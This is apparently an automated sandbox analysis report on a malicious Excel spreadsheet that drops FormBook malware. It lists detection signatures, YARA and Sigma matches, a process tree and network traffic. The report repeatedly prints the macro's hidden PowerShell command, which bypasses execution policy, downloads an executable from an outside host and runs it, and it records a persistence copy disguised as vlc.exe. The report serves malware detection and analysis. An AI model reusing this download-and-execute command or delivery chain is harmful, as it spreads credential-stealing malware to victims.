Analysis Report 5901777.xls

Overview

General Information

Sample Name: 5901777.xls
Analysis ID: 323692
MD5: 899e5af08f0794f0131adbf03f841045
SHA1: 242508434986d472b0b83387ec8d5d33888baa29
SHA256: 74b115a8b1f4e18d26b092dc965b60ad94dba931591d9913db219823d294904a
Tags: xls

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected FormBook
Bypasses PowerShell execution policy
Creates processes via WMI
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5988 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 3636 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • powershell.exe (PID: 5164 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • oftmhayq.exe (PID: 5540 cmdline: 'C:\Users\Public\oftmhayq.exe' MD5: 7E26E87AB642008D934824D509559859)
      • oftmhayq.exe (PID: 2344 cmdline: C:\Users\Public\oftmhayq.exe MD5: 7E26E87AB642008D934824D509559859)
  • powershell.exe (PID: 5184 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • oftmhayq.exe (PID: 4000 cmdline: 'C:\Users\Public\oftmhayq.exe' MD5: 7E26E87AB642008D934824D509559859)
      • oftmhayq.exe (PID: 3708 cmdline: C:\Users\Public\oftmhayq.exe MD5: 7E26E87AB642008D934824D509559859)
        • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • vlc.exe (PID: 3476 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe' MD5: 7E26E87AB642008D934824D509559859)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: 5901777.xls, Rule: PowerShell_in_Word_Doc, Description: Detects a powershell and bypass keyword in a Word document, Author: Florian Roth, Strings:
  • 0x30b17:$s1: powershell.exe
  • 0x30b4b:$s2: Bypass

Memory Dumps

Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source: 30.2.oftmhayq.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 30.2.oftmhayq.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 30.2.oftmhayq.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 29.2.oftmhayq.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 29.2.oftmhayq.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

System Summary:

Sigma detected: Executables Started in Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\oftmhayq.exe' , CommandLine: 'C:\Users\Public\oftmhayq.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\oftmhayq.exe, NewProcessName: C:\Users\Public\oftmhayq.exe, OriginalFileName: C:\Users\Public\oftmhayq.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ProcessCommandLine: 'C:\Users\Public\oftmhayq.exe' , ProcessId: 5540
Sigma detected: Execution in Non-Executable Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\oftmhayq.exe' , CommandLine: 'C:\Users\Public\oftmhayq.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\oftmhayq.exe, NewProcessName: C:\Users\Public\oftmhayq.exe, OriginalFileName: C:\Users\Public\oftmhayq.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ProcessCommandLine: 'C:\Users\Public\oftmhayq.exe' , ProcessId: 5540
Sigma detected: Suspicious Program Location Process Starts
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\oftmhayq.exe' , CommandLine: 'C:\Users\Public\oftmhayq.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\oftmhayq.exe, NewProcessName: C:\Users\Public\oftmhayq.exe, OriginalFileName: C:\Users\Public\oftmhayq.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ProcessCommandLine: 'C:\Users\Public\oftmhayq.exe' , ProcessId: 5540

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\Public\oftmhayq.exe, Avira: detection malicious, Label: HEUR/AGEN.1136389
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, Avira: detection malicious, Label: HEUR/AGEN.1136389
Multi AV Scanner detection for domain / URL
Source: sparepartiran.com, Virustotal: Detection: 10%
Source: http://sparepartiran.com, Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: 5901777.xls, Virustotal: Detection: 23%
Yara detected FormBook
Source: Yara match, File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\oftmhayq.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, Joe Sandbox ML: detected
Source: 30.2.oftmhayq.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.2.oftmhayq.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: global traffic, DNS query: name: sparepartiran.com
Source: global traffic, TCP traffic: 192.168.2.3:49743 -> 162.223.88.131:80
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Fri, 27 Nov 2020 10:38:08 GMT
  Server: Apache
  Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT
  Accept-Ranges: bytes
  Content-Length: 552960
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: Joe Sandbox View, IP Address: 162.223.88.131
Source: Joe Sandbox View, ASN Name: COLOUPUS
Source: global traffic, HTTP traffic detected:
  GET /js/2Q/5901777.pdf.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
  Host: sparepartiran.com
  Connection: Keep-Alive
Source: unknown, DNS traffic detected: queries for: sparepartiran.com
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.431695720.00000000063CD000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/I7s
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Kurst7D
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S7
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: oftmhayq.exe, 00000019.00000003.434710127.00000000063F1000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comc
          Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.como
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deX
          Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deocS
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000014.00000002.438220332.000001D20BD39000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: oftmhayq.exe, 00000018.00000002.467569207.0000000000EBB000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
          Source: Screenshot number: 12, Screenshot OCR: Enable Content : lj, 5 6 7 " _ _ _="1 - 8 9 10 . . 11 " 12 Microsoft Excel X 13 14 ! Wa
          Powershell drops PE file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\Public\oftmhayq.exe
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00409E3B30_2_00409E3B
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041DF9830_2_0041DF98
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CFA330_2_0041CFA3
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00402FB030_2_00402FB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134412030_2_01344120
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0132F90030_2_0132F900
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013499BF30_2_013499BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134A83030_2_0134A830
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013FE82430_2_013FE824
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E100230_2_013E1002
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013520A030_2_013520A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F20A830_2_013F20A8
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0133B09030_2_0133B090
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F28EC30_2_013F28EC
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2B2830_2_013F2B28
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134A30930_2_0134A309
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134AB4030_2_0134AB40
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0135EBB030_2_0135EBB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013D23E330_2_013D23E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E03DA30_2_013E03DA
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013EDBD230_2_013EDBD2
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0135ABD830_2_0135ABD8
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013DFA2B30_2_013DFA2B
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F22AE30_2_013F22AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E4AEF30_2_013E4AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01320D2030_2_01320D20
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2D0730_2_013F2D07
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F1D5530_2_013F1D55
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0135258130_2_01352581
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E2D8230_2_013E2D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0133D5E030_2_0133D5E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F25DD30_2_013F25DD
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0133841F30_2_0133841F
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013ED46630_2_013ED466
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E449630_2_013E4496
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F1FF130_2_013F1FF1
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013FDFCE30_2_013FDFCE
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01346E3030_2_01346E30
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013ED61630_2_013ED616
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2EF730_2_013F2EF7
          Source: 5901777.xls OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
          Source: 5901777.xls OLE indicator, VBA macros: true
          Source: C:\Users\Public\oftmhayq.exe Code function: String function: 0041BBE0 appears 38 times
          Source: C:\Users\Public\oftmhayq.exe Code function: String function: 0132D08C appears 48 times
          Source: C:\Users\Public\oftmhayq.exe Code function: String function: 012DB150 appears 159 times
          Source: C:\Users\Public\oftmhayq.exe Code function: String function: 01365720 appears 85 times
          Source: C:\Users\Public\oftmhayq.exe Code function: String function: 0132B150 appears 133 times
          Source: oftmhayq.exe.20.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.25.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 5901777.xls, type: SAMPLE Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
